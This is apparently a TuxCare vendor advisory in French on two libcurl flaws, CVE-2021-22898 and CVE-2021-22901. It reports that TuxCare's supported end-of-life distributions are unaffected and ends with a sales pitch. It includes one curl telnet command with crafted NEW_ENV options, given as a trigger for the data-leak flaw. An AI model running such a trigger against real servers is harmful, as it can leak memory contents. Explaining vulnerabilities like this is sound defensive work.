TuxCare - Test de toutes les vulnérabilités pour que vous n'ayez pas à le faire.

Dans le cadre de TuxCare, nous nous assurons que toutes les nouvelles vulnérabilités sont analysées et testées sur toutes les distributions et produits que nous supportons. Aujourd'hui, deux nouvelles vulnérabilités ont été divulguées qui affectent le code curl/libcurl, et parce que c'est quelque chose que nous couvrons avec notre support de cycle de vie étendu, nous avons effectué nos tests sur cette bibliothèque.

Nous avons effectué de nombreux tests et découvert qu'aucun des systèmes Linux en fin de vie que nous prenons en charge n'est affecté par ces failles. Ainsi, vous pouvez être assuré que vous n'êtes pas affecté par ces vulnérabilités si vous utilisez Centos 6, Oracle Linux 6, CloudLinux 6, ou Ubuntu 16, car ceux-ci sont couverts par notre service.

Libcurl, et par extension curl, le logiciel userland qui implémente la fonctionnalité libcurl, est un outil de transfert de fichiers qui prend en charge plusieurs protocoles. Il est souvent intégré à des logiciels tiers, même si cette présence n'est pas divulguée. Sa présence est tellement omniprésente qu'il est même sorti de la planète et est actuellement utilisé dans un rover sur Mars, où il fait partie du processus de transfert de données pour l'envoi d'images vers la Terre. À un niveau plus terre à terre, il est utilisé sans le savoir par les utilisateurs finaux chaque fois qu'ils ouvrent une page web sur un navigateur ou un courriel sur leur client de messagerie préféré.

Les deux vulnérabilités qui viennent d'être divulguées, CVE-2021-22898 et CVE-2021-22901, affectent libcurl de différentes manières. La première, d'une manière qui n'est plus surprenante, a été découverte dans du code vieux de 20 ans, introduit dans un changement de code le 22 mars 2001. La seconde a été introduite plus récemment, en février 2021.

En regardant de plus près CVE-2021-22898, il s'agit d'une faille dans la façon dont libcurl analyse la variable "CURLOPT_TELNETOPTIONS", exposée par curl comme la commande "-t". Cette faille peut être exploitée pour permettre l'exfiltration de données par le biais de paramètres spécialement conçus lors de la connexion à un serveur telnet.

Une ligne de commande facile à mettre en œuvre ressemble à ceci :

     curl telnet://exemple.com -tNEW_ENV=a,bbbbbb (256 'b')

Il n'existe actuellement aucune preuve de l'existence d'un code d'exploitation public. De plus, les serveurs telnet étant relativement rares aujourd'hui, il serait plutôt difficile de les exploiter dans la nature.

Quant à CVE-2021-22901, elle affecte libcurl (et par extension, curl) lorsqu'elle est compilée avec le support OpenSSL (ou un de ses forks, comme boringssl ou libressl). Il s'agit d'une vulnérabilité dans la façon dont libcurl réutilise une connexion à un moment où elle pourrait, théoriquement, déjà être éliminée, ce qui entraîne une vulnérabilité communément appelée "User After Free".

Une séquence très particulière d'événements doit se produire dans le bon ordre pour que cela se déclenche, et d'une manière étonnamment intéressante, plutôt que le serveur soit la partie vulnérable, c'est en fait le client qui peut être compromis par un serveur malveillant.

L'exploitation pourrait se produire dans une situation où libcurl utilise la mise en cache de l'ID de session, la réutilisant pour plusieurs requêtes, et libérant la connexion entre les requêtes.

Les deux vulnérabilités n'affectent pas le code curl/libcurl actuellement déployé auprès de nos abonnés à cycle de vie étendu. Comme pour toutes les vulnérabilités, TuxCare continuera à fournir des tests et un savoir-faire en matière de sécurité pour garantir la sécurité de vos systèmes.

Vous trouverez plus d'informations sur les risques liés à l'utilisation d'une distribution Linux non supportée en fin de vie ici.

 Si vous n'êtes pas encore abonné à nos produits, c'est une excellente occasion de parler à nos ingénieurs et de découvrir comment TuxCare peut prendre en charge vos tâches d'administration système et améliorer vos pratiques de sécurité. Pour en savoir plus sur nos services , cliquez ici.